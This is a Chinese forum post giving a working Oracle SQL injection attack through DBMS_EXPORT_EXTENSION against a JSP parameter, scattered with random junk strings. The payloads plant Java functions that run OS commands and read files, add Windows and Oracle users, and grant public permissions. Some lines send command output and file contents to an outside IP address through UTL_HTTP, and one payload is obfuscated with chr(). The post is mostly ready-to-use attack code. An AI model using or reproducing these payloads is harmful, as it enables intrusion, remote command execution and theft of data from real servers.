以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 ( {. [# T3 J4 E" }4 A8 T7 [
2 t, B4 ?% a: b
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) 6 b- ^) ~0 j" ]+ D
的形式即可。(用" 'a'|| "是为了让语句返回true值)
$ g7 f0 D8 b" ~语句有点长,可能要用post提交。
6 @( L# Q$ u4 \, T& \( O. m以下是各个步骤: 8 s' w; p2 a& B9 Y
1.创建包 % @, k" S0 Y6 q7 J
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
8 @ L! e1 v! j7 m- `6 y6 W0 I/xxx.jsp?id=1 and '1'<>'a'||(
8 k7 [( e# H7 u2 x6 yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
+ n% Y4 I( c+ Screate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
. n5 j0 F8 g/ C6 X2 A% Fnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
* N0 h8 ~# z4 S4 Z7 j7 y}'''';END;'';END;--','SYS',0,'1',0) from dual / |( e4 G1 \3 [5 z+ r, z. w' J
) # @5 n3 L: ~) O, A
------------------------
: t# x, q0 Q% W" o. q3 d) g# o如果url有长度限制,可以把readFile()函数块去掉,即: 1 g3 h( ?, ]. F
/xxx.jsp?id=1 and '1'<>'a'||( 6 ]% Z; {% f" w! c0 {7 u3 [. b5 J1 w
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
+ l5 j8 d) x: O* zcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
" d) d$ C/ r# ?! L9 A. anew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
$ B% Y4 I8 a! Z: e. F}'''';END;'';END;--','SYS',0,'1',0) from dual - `: {6 ^4 N5 X4 Y' a
)
& l! u9 S3 P! M t5 w/ A3 M3 m- I同时把后面步骤 提到的 对readFile()的处理语句去掉。 6 e. T r- d. N! c! y
------------------------------ 1 X" z: K1 ^) a1 J( v* T
2.赋Java权限 . s' B- P' g+ b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
" n) v4 C1 l4 w2 k) u3.创建函数 ! K0 U7 O! K: D' Z# _& `
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
( F2 M9 q& T8 u& q* X" ucreate or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
$ j- P3 y, U uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ d$ m/ o+ V0 e* }2 K \7 Qcreate or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
$ f( R2 q+ C: r k4.赋public执行函数的权限 : q4 E8 \$ \# a& [
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual2 V& y; R( u" b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
; E/ z; P1 D9 ^5.测试上面的几步是否成功
7 d8 y% P& e) l" @and '1'<>'11'||( \% Z, Y+ R! G& @, @4 C0 A
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
7 V# c2 l, h# C8 I0 m$ m8 f7 h) ! H+ Y# `, O: t3 h* _# {
and '1'<>( ! q- n! Z' \' x4 @6 Q1 A# T
select OBJECT_ID from all_objects where object_name ='LINXREADFILE' ) e: q0 [) T7 u4 g4 v# X; O$ C
) 0 c8 F9 L3 R$ ^% z4 r/ X
6.执行命令:
4 v4 D& f s2 M+ J1 t) a/xxx.jsp?id=1 and '1'<>(
. P1 C; `+ j# Y1 f* q Z: Zselect sys.LinxRunCMD('cmd /c net user linx /add') from dual
0 [7 s/ _$ }9 }; w8 v& c
; O1 T% k7 F9 d: `! w7 I)
+ h& p. s1 o+ X1 V4 |: Y/xxx.jsp?id=1 and '1'<>( + m$ f8 Q- n8 U& H v" b
select sys.LinxReadFile('c:/boot.ini') from dual/ `3 J& _2 j$ Y3 s) Z
7 T: m. a, W' u7 i' q( v7 d, p+ h)7 n$ g( s5 k4 g+ z4 E
, D- y+ d6 N7 D
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 6 r; v2 K1 z4 q5 X0 o
如果要查看运行结果可以用 union :
: Q' E# F9 k) f/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
$ D+ k z; b% _! t: Q; u或者UTL_HTTP.request(:
; ?5 Y1 u: A% V$ h/xxx.jsp?id=1 and '1'<>(
! f8 e8 k% z. v+ p1 g. _" ?SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
' @1 T* b9 Q5 ` R0 P# ~/ a$ x)
1 {; C2 E. P, ]/xxx.jsp?id=1 and '1'<>( 4 F& Y8 \% u1 d9 N
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
0 f1 c- S2 y: U* d)
2 l0 k7 x2 y2 l* g+ C( S注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。 E& x& g6 r! ~$ [$ @8 \$ o( c
-------------------- 3 a4 H& B, }) w* P
6.内部变化 9 W9 r2 r, k! L
通过以下命令可以查看all_objects表达改变:
* y0 r) {/ h) {) sselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'5 M* H/ N" \# ?6 m
7.删除我们创建的函数
) b; f& x5 d8 t* j. e& Nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* _$ A6 g o& B3 q
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual 6 E' p3 X7 G& l$ ^% k2 O# I+ B& \
==================================================== ( n. r! b0 w8 @
全文结束。谨以此文赠与我的朋友。
: o6 `5 A4 V* V, h' ~ jlinx
( H* M G: H! A124829445 4 l0 o' M% o. Q! R& q# s/ D0 n/ _+ a2 J
2008.1.12
6 Y7 z# n" w' o6 B! }linyujian@bjfu.edu.cn
. ^% s$ i, l& Y. h0 f======================================================================
! A8 P6 Q2 E1 g测试漏洞的另一方法: # Q0 U& s* w" ~: ^6 k* d. R( d
创建oracle帐号: ' H. s* S+ J% O/ l3 Z; s
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''. v: I3 z, C* Y P1 v, L
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
) ^* [* t% d) v N# u即: ' q4 E3 _2 Q6 F
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),3 R0 Y. o- a3 v7 ~" l$ q3 v
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual ' O" F# p& c! {( Z& x: ]' E, J) Q
确定漏洞存在: # C9 \# D" T" }) y" t6 Z$ x% G0 s
1<>( 8 ^$ [8 A4 e" R" t# ^: B5 W# _0 u# L
select user_id from all_users where username='LINXSQL' + k: A0 A5 U; \9 e
) ( p! X! L6 {2 _
给linxsql连接权限: * @1 Q: b0 m! G0 Z0 t9 O- l: \$ k
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''& g& ?% T4 L5 a- D* d* d3 X! k3 E
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
0 [. ~( } g6 q; i7 ?4 I) ^删除帐号: + x/ P Q2 M% n% c3 P
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''+ o$ b0 a* g0 J
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
( m. G5 _8 o' W% Q====================== ; N% T8 o" d! ~# u4 C4 ~. U6 R8 O
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User: B5 V O7 u9 a5 n) \2 y
1.jsp?id=1 and '1'<>(
, K: Z* S0 f, z" v! `5 w4 rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& d& B& ?) q M( i' g# d0 f- hcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
& \ Y2 F$ @" }) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
' W% U# K8 g0 {: H6 v )" r3 {: [* l* t0 J8 _
) M, Q2 g( q( F: ?
7 v8 v! I0 W5 p' a. r9 \
+ n0 u! @9 V" `& E6 ?
|
发表于 2012-12-18 12:21:48
收藏
支持
反对